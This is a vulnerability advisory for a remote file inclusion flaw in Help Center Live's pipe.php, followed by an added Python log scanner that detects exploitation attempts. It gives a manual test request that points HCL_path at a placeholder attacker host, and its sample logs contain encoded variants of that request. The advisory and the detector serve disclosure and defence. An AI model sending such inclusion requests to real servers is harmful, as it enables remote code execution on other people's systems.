Help Center Live pipe.php Arbitrary Command Execution

2004-12-24T17:02:16
ID OSVDB:12598
Type osvdb
Reporter James Bercegay()
Modified 2004-12-24T17:02:16

Description

Vulnerability Description

Help Center Live contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to pipe.php not properly sanitizing user input supplied to the HCL_path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

http://[victim]/inc/pipe.php?HCL_path=http://[attacker]/
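
The request pattern above can be picked out of web server access logs; the following is an added detection example, not part of the original advisory. The log lines, client and host IP addresses are constructed, and the check flags any HCL_path value handed to /inc/pipe.php that decodes (including once percent-encoded) to a remote or stream-wrapper location rather than a local path:

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Constructed sample Apache combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Dec/2004:17:02:16 +0000] "GET /inc/pipe.php?HCL_path=../ HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.7 - - [24/Dec/2004:17:03:01 +0000] "GET /inc/pipe.php?HCL_path=http://203.0.113.9/ HTTP/1.1" 200 2048 "-" "curl/7.0"
10.0.0.8 - - [24/Dec/2004:17:03:40 +0000] "GET /inc/pipe.php?HCL_path=%68ttp%3a%2f%2f203.0.113.9%2fx HTTP/1.1" 200 2048 "-" "curl/7.0"
10.0.0.9 - - [24/Dec/2004:17:04:10 +0000] "GET /index.php?page=help HTTP/1.1" 200 900 "-" "Mozilla/4.0"
10.0.0.9 - - [24/Dec/2004:17:05:00 +0000] "GET /inc/pipe.php?HCL_path=/var/www/hcl HTTP/1.1" 200 512 "-" "Mozilla/4.0"
"""

# Matches the client IP and request target of a combined-format log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

# Locations PHP's include() can read from when URL stream wrappers are enabled.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

def is_remote_include_value(value: str) -> bool:
    """True if an include-path parameter resolves to a remote/stream location.

    Decoded twice so percent-encoded schemes (e.g. %68ttp%3a%2f%2f) are caught
    as well as literal ones; a local path such as /var/www/hcl is not flagged.
    """
    decoded = unquote_plus(unquote_plus(value)).strip().lower()
    return decoded.startswith(REMOTE_SCHEMES)

def scan_access_log(lines, script="/inc/pipe.php", param="HCL_path"):
    """Return (client_ip, decoded_value) for each request that passes a remote
    location in the vulnerable script's include-path parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != script:
            continue
        # parse_qs already decodes once; keep_blank_values keeps empty params visible
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if is_remote_include_value(value):
                hits.append((m.group("ip"), unquote_plus(unquote_plus(value))))
    return hits

if __name__ == "__main__":
    for ip, value in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"remote file inclusion attempt from {ip}: HCL_path={value}")
```

Detection only narrows the window; the durable fix for this class of bug is for the script to derive its include base path internally instead of from request input, with PHP's URL stream wrappers for include disabled as a backstop.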

References:

Vendor URL: http://www.helpcenterlive.com/
Security Tracker: 1012685
Secunia Advisory ID: 13652
Related OSVDB ID: 12597
Related OSVDB ID: 12631
Other Advisory URL: http://www.gulftech.org/?node=research&article_id=00058-12242004
Keyword: Remote File Inclusion
CVE: CVE-2004-2602
Bugtraq ID: 12105